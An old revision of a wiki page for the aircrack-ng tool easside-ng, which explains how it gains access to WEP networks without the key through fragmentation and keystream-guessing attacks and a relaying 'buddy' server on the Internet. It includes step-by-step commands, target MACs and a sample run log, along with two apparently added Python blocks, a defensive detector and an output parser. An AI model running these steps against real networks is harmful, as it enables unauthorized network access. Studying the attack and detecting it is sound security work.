
This is an old revision of the document!


Easside-ng

++++++ IMPORTANT ++++++
++++++ IMPORTANT ++++++
++++++ IMPORTANT ++++++

This functionality will be available in a future release. It is NOT available currently.

++++++ IMPORTANT ++++++
++++++ IMPORTANT ++++++
++++++ IMPORTANT ++++++

Description

Easside-ng is an auto-magic tool which allows you to communicate via an access point (AP) without knowing the WEP key. It first identifies a network, then proceeds to associate with it, obtain PRGA (pseudo random generation algorithm) xor data, determine the network IP scheme and then set up a TAP interface so that you can communicate with the AP. All this is done without your intervention.

There are two primary papers, “The Fragmentation Attack in Practice” by Andrea Bittau and “The Final Nail in WEP's Coffin” by Andrea Bittau, Mark Handley and Joshua Lackey, which are of interest. See the links page for these papers and more. The papers referenced provide excellent background information if you would like to understand the underlying methodologies. The concepts for the fragmentation attack currently incorporated in aircrack-ng came from these papers.

Accessing the wireless network without knowing the WEP key is done by having the AP itself decrypt the packets. This is achieved by having a “buddy” process running on a server accessible on the Internet. This “buddy” server echoes the received decrypted packets back to the system running easside-ng. This imposes a number of critical requirements for easside-ng to work:

  • The access point must be able to communicate with the Internet
  • A “buddy” server must exist on the Internet without firewalling
  • The system running easside-ng must have access to the Internet and be able to communicate with the “buddy” server
  • The system running easside-ng must have a wireless card

Here are the steps which easside-ng takes:

  1. Channel hops looking for a WEP network.
  2. Once a network is found, it tries to authenticate.
  3. Once the program has successfully authenticated then it associates with the AP.
  4. After sniffing a single data packet, it proceeds to discover at least 1504 bytes of PRGA by sending out larger broadcasts and intercepting the relayed packets. This is what is known as the fragmentation attack. The PRGA is written to the prga.log file.
  5. It then decrypts the IP network by guessing the next three bytes of PRGA using multicast frames and the linear keystream expansion technique. By decrypting the ARP request, the network number scheme can be determined. This is used to build the ARP request which is used for subsequent injection.
  6. It creates a permanent TCP connection with the “buddy” server and verifies connectivity.
  7. It then tests connectivity via the access point and determines the Internet IP address that the AP uses. It also lists the round trip time of the test packets. This gives you an idea of the quality of connection.
  8. The TAP interface is then created.

At this point, you run “ifconfig at0 up” and you are now able to communicate with any host on the AP network via this TAP interface. Notice that you don't need the WEP key to do this!

So you may be asking “What is the magic? How can you access the AP without knowing the WEP key?”. The method is quite simple yet ingenious. To send packets, most APs have the bad habit of accepting packets with the same initialization vector over and over again. Thus the PRGA is used to encrypt packets being sent to hosts on the AP network. To receive packets, the “buddy” server is leveraged. When encrypted packets are received, headers are added to them and the extended packet is sent (as UDP packets) to the “buddy” server via the AP. The AP decrypts this extended packet and forwards it to the “buddy” server on the Internet. In turn, the “buddy” server sends the decrypted packet back directly to easside-ng via the “easside-ng - buddy” connection.

So you may also be asking “What is the linear keystream expansion technique?”. The foundation is the fact that packets like an encrypted ARP request can easily be identified, combined with the fact that the start of such a packet has known plain text. So the program first obtains the PRGA from the known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. The first fragment is one byte longer than the known PRGA, and the PRGA for the extra byte is guessed. These guesses are sent and the program listens to see which one is replayed by the AP. The replayed packet has the correct PRGA, and this value was included in the destination multicast address. Now that we know the correct PRGA, one more byte can be decrypted in the original ARP request. This process is repeated until the sending IP in the original ARP request is decrypted. It takes a maximum of 256 guesses to determine the correct PRGA for a particular byte and on average only 128 guesses.
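From the defender's side, the two paragraphs above describe what this traffic looks like on the air: one transmitter replaying the same WEP IV many times, fragmented group-addressed frames carrying the PRGA-discovery broadcasts, and a sweep over many distinct multicast destinations while a keystream byte is being guessed. The following is an added example, not part of the easside-ng documentation or of aircrack-ng: a small heuristic detector in Python that reads constructed frame-metadata lines (the line format, the thresholds and the sample MACs are assumptions for this example) and flags those three behaviours per transmitter.

```python
"""Heuristic detector for the on-air pattern described above (added example)."""
import re
from collections import defaultdict

# Assumed line format, one 802.11 data frame per line, as a monitor-mode
# capture tool might export it:
#   <time> <src MAC> <dst MAC> iv=<6 hex> frag=<n> morefrag=<0|1>
LINE_RE = re.compile(
    r"^(?P<t>\d+\.\d+)\s+(?P<src>[0-9a-f:]{17})\s+(?P<dst>[0-9a-f:]{17})\s+"
    r"iv=(?P<iv>[0-9a-f]{6})\s+frag=(?P<frag>\d+)\s+morefrag=(?P<mf>[01])$",
    re.IGNORECASE,
)


def parse_line(line):
    """Return a frame record, or None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return {"t": float(d["t"]), "src": d["src"].lower(), "dst": d["dst"].lower(),
            "iv": d["iv"].lower(), "frag": int(d["frag"]), "morefrag": d["mf"] == "1"}


def is_multicast(mac):
    """IEEE 802 group bit: least-significant bit of the first octet (covers broadcast)."""
    return int(mac.split(":")[0], 16) & 1 == 1


def analyze(lines, iv_reuse_threshold=20, fragment_threshold=4, multicast_sweep_threshold=32):
    """Flag transmitters showing IV reuse, fragmented broadcasts or a multicast sweep.

    Thresholds are assumptions chosen for the constructed sample, not tool values.
    """
    iv_count = defaultdict(int)     # (src, iv) -> frames seen with that IV
    frag_count = defaultdict(int)   # src -> fragmented group-addressed frames
    mcast_dsts = defaultdict(set)   # src -> distinct multicast destinations
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        iv_count[(f["src"], f["iv"])] += 1
        if is_multicast(f["dst"]):
            mcast_dsts[f["src"]].add(f["dst"])
            if f["frag"] > 0 or f["morefrag"]:
                frag_count[f["src"]] += 1
    alerts = []
    for (src, iv), n in iv_count.items():
        if n >= iv_reuse_threshold:
            alerts.append(("iv_reuse", src, f"IV {iv} seen {n} times"))
    for src, n in frag_count.items():
        if n >= fragment_threshold:
            alerts.append(("fragmented_broadcast", src, f"{n} fragmented group-addressed frames"))
    for src, dsts in mcast_dsts.items():
        if len(dsts) >= multicast_sweep_threshold:
            alerts.append(("multicast_sweep", src, f"{len(dsts)} distinct multicast destinations"))
    return sorted(alerts)


def sample_lines():
    """Constructed capture: one ordinary station and one behaving as the text describes."""
    lines, t = [], 0.0
    # Ordinary station: unicast to the AP with a fresh IV on every frame.
    for i in range(30):
        t += 0.01
        lines.append(f"{t:.3f} 00:1a:2b:3c:4d:5e 00:14:6c:7e:40:80 iv={i:06x} frag=0 morefrag=0")
    # Second station: the same IV reused on fragmented broadcasts ...
    for i in range(24):
        t += 0.01
        lines.append(f"{t:.3f} 00:08:d4:86:7e:98 ff:ff:ff:ff:ff:ff iv=4b0200 "
                     f"frag={i % 6} morefrag={1 if i % 6 < 5 else 0}")
    # ... followed by a sweep over many multicast destinations with that IV.
    for g in range(40):
        t += 0.01
        lines.append(f"{t:.3f} 00:08:d4:86:7e:98 01:00:5e:00:00:{g:02x} iv=4b0200 frag=0 morefrag=0")
    return lines


if __name__ == "__main__":
    for alert in analyze(sample_lines()):
        print(*alert)
```

On the constructed sample only the second station trips the rules, with all three alerts; the ordinary station never reuses an IV and only sends unicast. In a real deployment the only durable fix remains retiring WEP, but these counters are cheap to keep in a wireless IDS and give a concrete signal for the behaviour the text describes.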

There are a few known limitations:

  • Only open authentication is supported. Shared key authentication is not supported.
  • Only B and G networks are supported.

Usage

Usage: easside-ng <arg> [v0]

Where:

  • -h Displays the list of options.
  • -v MAC address of the Access Point (Optional)
  • -m Source MAC address to be used (Optional)
  • -i Source IP address to be used on the wireless LAN. Defaults to the decoded network plus “.123” (Optional)
  • -r IP address of the AP router. This could be the WAN IP of the AP or an actual router IP depending on the topology. Defaults to the decoded network plus “.1”. (Optional)
  • -s IP address of the “buddy” server (Mandatory)
  • -f Wireless interface name. (Mandatory)
  • -c Locks the card to the specified channel (Optional)
  • [v0] Current version number. Informational only.

Usage: buddy-ng

NOTE: There are no parameters for buddy-ng. Once invoked, it listens on TCP port 6969 and UDP port 6969. TCP is used for the permanent connection between easside-ng and buddy-ng. UDP is used to receive decrypted packets from the AP.

When you run easside-ng, it automatically creates a file in the current directory:

  • prga.log - Contains the PRGA obtained through the fragmentation attack. The following is NOT correct. It is a future feature: “This can be used as input to other aircrack-ng suite tools which require PRGA as input. You can also use the PRGA from other tools for this file.”

It is very important to delete this file prior to starting the program when you change target access point.

Scenarios

Standard Usage Example

Be sure to use airmon-ng to put your card into monitor mode.

First, you need to start a buddy server. This needs to be located on the Internet and be accessible from the system running easside-ng via TCP. It must also be accessible from the AP via UDP. Port 6969 cannot be firewalled on it.

You start the buddy server:

 buddy-ng

It responds:

 buddy-ng
 Waiting for connexion

When easside-ng connects, it responds similar to:

 Got connection from 10.113.65.187
 Handshake complete
 Inet check by 10.113.65.187 1

The IP 10.113.65.187 above is the IP of the system running easside-ng.

Now run easside-ng:

 easside-ng -f ath0 -v 00:14:6C:7E:40:80 -c 9  -s 10.116.23.144

Where:

  • -f ath0 This is the wireless interface name.
  • -v 00:14:6C:7E:40:80 This is the MAC address of the AP.
  • -c 9 This is the channel the AP is on.
  • -s 10.116.23.144 This is the buddy server IP.

The system responds:

 Setting tap MTU
 Sorting out wifi MAC
 MAC is 00:08:D4:86:7E:98
 Setting tap MAC
 [14:40:06.596419] Ownin...
 SSID teddy Chan 9 Mac 00:14:6C:7E:40:80
 Sending auth request
 Authenticated
 Sending assoc request
 Associated: 1
 Assuming ARP 54
 [14:40:13.537842] Got 22 bytes of PRGA IV [4B:02:00]
 [14:40:13.545021] Got 58 bytes of PRGA IV [4C:02:00]
 [14:40:13.648670] Got 166 bytes of PRGA IV [4D:02:00]
 [14:40:13.753087] Got 490 bytes of PRGA IV [4E:02:00]
 [14:40:13.863819] Got 1462 bytes of PRGA IV [4F:02:00]
 [14:40:13.966753] Got 1504 bytes of PRGA IV [50:02:00]
 Assuming ARP 36
 [15:23:42.047332] Guessing prga byte 22 with 16
 ARP IP so far: 192
 [15:23:42.749330] Guessing prga byte 23 with 3F
 ARP IP so far: 192.168
 [15:23:43.815329] Guessing prga byte 24 with 60
 ARP IP so far: 192.168.1
 My IP 192.168.1.123
 Rtr IP 192.168.1.1
 Sending who has 192.168.1.1 tell 192.168.1.123
 Rtr MAC 00:14:6C:7E:40:80
 Trying to connect to buddy: 10.116.23.144:6969
 Connected
 Handshake compl33t
 Checking for internet... 1
 Internet w0rx.  Public IP 10.113.65.187
 Rtt 77ms

At this point, you need to bring up the TAP interface:

 ifconfig at0 up

Now you can send and receive packets to and from the AP network, which in this case is 192.168.1.0/24, via the at0 interface.
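The console output in the example above is the only record a run leaves besides prga.log, so it is worth being able to read it mechanically, for instance when such output turns up in an incident or when comparing runs. The following is an added example, not part of aircrack-ng: a Python parser for the progress lines shown on this page that summarises PRGA growth per fragmentation round, the keystream bytes recovered by guessing, the addresses the tool settled on, and the buddy round-trip time. The line patterns are taken from the output above; any line the tool prints that is not matched is ignored.

```python
"""Parser for the easside-ng console output shown above (added example)."""
import re
from datetime import datetime

TS = r"\[(?P<ts>\d{2}:\d{2}:\d{2}\.\d{6})\]"
PRGA_RE = re.compile(TS + r"\s+Got (?P<n>\d+) bytes of PRGA IV \[(?P<iv>[0-9A-Fa-f:]{8})\]")
GUESS_RE = re.compile(TS + r"\s+Guessing prga byte (?P<idx>\d+) with (?P<val>[0-9A-Fa-f]{2})")
ARP_RE = re.compile(r"ARP IP so far: (?P<ip>[\d.]+)")
MYIP_RE = re.compile(r"My IP (?P<ip>[\d.]+)")
RTR_RE = re.compile(r"Rtr IP (?P<ip>[\d.]+)")
PUB_RE = re.compile(r"Public IP (?P<ip>[\d.]+)")
RTT_RE = re.compile(r"Rtt (?P<ms>\d+)ms")

# The tool's own output from the example on this page, used here as sample input.
SAMPLE_OUTPUT = """\
Setting tap MTU
Sorting out wifi MAC
MAC is 00:08:D4:86:7E:98
Setting tap MAC
[14:40:06.596419] Ownin...
SSID teddy Chan 9 Mac 00:14:6C:7E:40:80
Sending auth request
Authenticated
Sending assoc request
Associated: 1
Assuming ARP 54
[14:40:13.537842] Got 22 bytes of PRGA IV [4B:02:00]
[14:40:13.545021] Got 58 bytes of PRGA IV [4C:02:00]
[14:40:13.648670] Got 166 bytes of PRGA IV [4D:02:00]
[14:40:13.753087] Got 490 bytes of PRGA IV [4E:02:00]
[14:40:13.863819] Got 1462 bytes of PRGA IV [4F:02:00]
[14:40:13.966753] Got 1504 bytes of PRGA IV [50:02:00]
Assuming ARP 36
[15:23:42.047332] Guessing prga byte 22 with 16
ARP IP so far: 192
[15:23:42.749330] Guessing prga byte 23 with 3F
ARP IP so far: 192.168
[15:23:43.815329] Guessing prga byte 24 with 60
ARP IP so far: 192.168.1
My IP 192.168.1.123
Rtr IP 192.168.1.1
Sending who has 192.168.1.1 tell 192.168.1.123
Rtr MAC 00:14:6C:7E:40:80
Trying to connect to buddy: 10.116.23.144:6969
Connected
Handshake compl33t
Checking for internet... 1
Internet w0rx.  Public IP 10.113.65.187
Rtt 77ms
"""


def _seconds(ts):
    """Convert the tool's HH:MM:SS.ffffff timestamp to seconds since midnight."""
    t = datetime.strptime(ts, "%H:%M:%S.%f")
    return t.hour * 3600 + t.minute * 60 + t.second + t.microsecond / 1e6


def parse_output(text):
    """Reduce easside-ng console output to a summary dict; unmatched lines are ignored."""
    s = {"prga_rounds": [], "guesses": {}, "arp_ip_prefix": None,
         "my_ip": None, "rtr_ip": None, "public_ip": None, "rtt_ms": None}
    for line in text.splitlines():
        line = line.strip()
        if m := PRGA_RE.search(line):
            # (time in seconds, PRGA bytes known so far, IV the tool used)
            s["prga_rounds"].append((_seconds(m["ts"]), int(m["n"]), m["iv"]))
        elif m := GUESS_RE.search(line):
            s["guesses"][int(m["idx"])] = int(m["val"], 16)
        elif m := ARP_RE.search(line):
            s["arp_ip_prefix"] = m["ip"]     # last occurrence is the most complete
        elif m := MYIP_RE.search(line):
            s["my_ip"] = m["ip"]
        elif m := RTR_RE.search(line):
            s["rtr_ip"] = m["ip"]
        elif m := PUB_RE.search(line):
            s["public_ip"] = m["ip"]
        elif m := RTT_RE.search(line):
            s["rtt_ms"] = int(m["ms"])
    rounds = s["prga_rounds"]
    s["prga_bytes"] = rounds[-1][1] if rounds else 0
    s["prga_phase_seconds"] = round(rounds[-1][0] - rounds[0][0], 6) if rounds else 0.0
    return s


if __name__ == "__main__":
    for key, value in parse_output(SAMPLE_OUTPUT).items():
        print(f"{key}: {value}")
```

On the page's output the parser reports six fragmentation rounds growing from 22 to 1504 bytes of PRGA in well under a second, three guessed keystream bytes (22, 23 and 24) that together reveal the 192.168.1 prefix, and a 77 ms round trip to the buddy. The short PRGA phase is a useful reminder of how little airtime this stage needs, which is why detection has to key on frame patterns rather than on duration.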

Usage Tips

The above example is for a specific Access Point on a specific channel. You can also let easside-ng scan for the AP by using “easside-ng -f ath0 -s 10.116.23.144”.

Usage Troubleshooting

Make sure your card is in monitor mode.

Make sure your card can inject by testing it with the aireplay-ng injection test. Also specifically ensure you can communicate with the AP in question.

Make sure your card supports the fragmentation attack. Again, this can be confirmed with the aireplay-ng injection test.

Make sure to delete prga.log if you are changing access points or if you want to restart cleanly. In general, if you have problems, it is a good idea to delete it.

There are a few known limitations:

  • Only open authentication is supported. Shared key authentication is not supported.
  • Only B and G networks are supported.
easside-ng.1184878159.txt.gz · Last modified: 2007/07/19 22:49 by darkaudax